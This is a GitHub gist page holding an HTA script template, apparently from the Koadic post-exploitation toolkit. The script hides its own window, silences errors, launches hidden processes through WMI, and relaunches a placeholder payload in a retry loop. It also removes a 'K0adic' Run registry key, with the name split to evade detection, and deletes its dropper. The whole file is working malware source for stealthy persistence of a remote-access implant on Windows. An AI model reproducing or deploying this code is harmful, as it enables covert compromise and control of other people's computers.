Last active
June 14, 2019 21:47
-
-
Save TheNaterz/2c1af08e556b53d7f46db36ea30a8caf to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<script language="JScript"> | |
window.moveTo(-1337, -2019); | |
window.blur(); | |
window.resizeTo(2, 4); | |
try | |
{ | |
window.onerror = function(sMsg, sUrl, sLine) { return false; } | |
window.onfocus = function() { window.blur(); } | |
} | |
catch (e){} | |
var Koadic = {}; | |
Koadic.WS = new ActiveXObject("WScript.Shell"); | |
Koadic.FS = new ActiveXObject("Scripting.FileSystemObject"); | |
Koadic.isHTA = function() | |
{ | |
return typeof(window) !== "undefined"; | |
} | |
Koadic.process = {}; | |
Koadic.process.currentPID = function() | |
{ | |
var cmd = Koadic.file.getPath("%comspec% /K hostname"); | |
var childPid = Koadic.WMI.createProcess(cmd); | |
var pid = -1; | |
var latestTime = 0; | |
var latestProc = null; | |
var processes = Koadic.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
if (proc.ProcessId == childPid) | |
{ | |
latestProc = proc; | |
break; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
pid = latestProc.ParentProcessId; | |
latestProc.Terminate(); | |
return pid; | |
} | |
Koadic.process.kill = function(pid) | |
{ | |
var processes = Koadic.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
if (proc.ProcessId == pid) | |
{ | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
return false; | |
} | |
Koadic.process.list = function() | |
{ | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); | |
var query = "Select * From Win32_Process"; | |
return wmi.ExecQuery(query); | |
} | |
Koadic.exit = function() | |
{ | |
if (Koadic.isHTA()) | |
{ | |
try { | |
window.close(); | |
} catch(e){} | |
try { | |
window.self.close(); | |
} catch (e){} | |
try { | |
window.top.close(); | |
} catch (e){} | |
try{ | |
self.close(); | |
} catch (e){} | |
try | |
{ | |
window.open('', '_self', ''); | |
window.close(); | |
} | |
catch (e) | |
{ | |
} | |
} | |
try | |
{ | |
WScript.quit(); | |
} | |
catch (e) | |
{ | |
} | |
try | |
{ | |
var pid = Koadic.process.currentPID(); | |
Koadic.process.kill(pid); | |
} | |
catch (e) | |
{ | |
} | |
} | |
Koadic.WMI = {}; | |
Koadic.WMI.createProcess = function(cmd) | |
{ | |
var SW_HIDE = 0; | |
var pid = 0; | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); | |
si.ShowWindow = SW_HIDE; | |
si.CreateFlags = 16777216; | |
si.X = si.Y = si.XSize = si.ySize = 1; | |
var w32proc = wmi.Get("Win32_Process"); | |
var method = w32proc.Methods_.Item("Create"); | |
var inParams = method.InParameters.SpawnInstance_(); | |
inParams.CommandLine = cmd; | |
inParams.CurrentDirectory = null; | |
inParams.ProcessStartupInformation = si; | |
var outParams = w32proc.ExecMethod_("Create", inParams); | |
return outParams.ProcessId; | |
} | |
Koadic.process.kill = function(pid) | |
{ | |
var processes = Koadic.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
if (proc.ProcessId == pid) | |
{ | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
return false; | |
} | |
Koadic.file = {}; | |
Koadic.file.getPath = function(path) | |
{ | |
return Koadic.WS.ExpandEnvironmentStrings(path); | |
} | |
Koadic.file.deleteFile = function(path) | |
{ | |
Koadic.FS.DeleteFile(Koadic.file.getPath(path), true); | |
}; | |
Koadic.shell = {}; | |
Koadic.shell.run = function(cmd, fork) | |
{ | |
var fork = (typeof(fork) !== "undefined") ? fork : true; | |
var c = "%comspec% /q /c " + cmd; | |
Koadic.WS.Run(cmd, 0, !fork); | |
} | |
Koadic.persist = {}; | |
Koadic.persist.run = function(cmd) | |
{ | |
var pid = Koadic.WMI.createProcess(cmd); | |
Koadic.shell.run('ping 127.0.0.1 -n 11', false); | |
return pid; | |
} | |
Koadic.persist.clean = function() | |
{ | |
var hkey = ~HKEY~; | |
var hkeyname = ""; | |
switch(hkey) | |
{ | |
case 0x80000001: | |
hkeyname = "HKCU"; | |
break; | |
case 0x80000002: | |
hkeyname = "HKLM"; | |
break; | |
default: | |
break; | |
} | |
var path = "Soft"+"ware\\Micros"+"oft\\Wi"+"ndows\\Cur"+"rentVer"+"sion\\Ru"+"n"; | |
var key = "K0"+"adic"; | |
Koadic.shell.run("reg delete "+hkeyname+"\\"+path+" /v "+key+" /f"); | |
Koadic.delete.file("~DROPPERPATH~"); | |
} | |
try | |
{ | |
var attempts = ~RETRYATTEMPTS~; | |
var delay = ~RETRYDELAY~ + 1; | |
var infflag = false; | |
if (attempts == -1) | |
{ | |
infflag = true; | |
} | |
while (true) | |
{ | |
var pid = Koadic.persist.run("~PAYLOAD~"); | |
if (Koadic.process.kill(pid)) | |
{ | |
if (!infflag) | |
{ | |
attempts -= 1; | |
if (attempts == 0) | |
{ | |
Koadic.persist.clean(); | |
break; | |
} | |
} | |
Koadic.shell.run('ping 127.0.0.1 -n '+delay.toString(), false); | |
} | |
else | |
{ | |
break; | |
} | |
} | |
} | |
catch(e) | |
{ | |
//do nothing | |
} | |
Koadic.exit(); | |
</script> | |
<hta:application caption="no" windowState="minimize" showInTaskBar="no" | |
scroll="no" navigable="no" /> | |
<!-- --> | |
</head> | |
<body> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment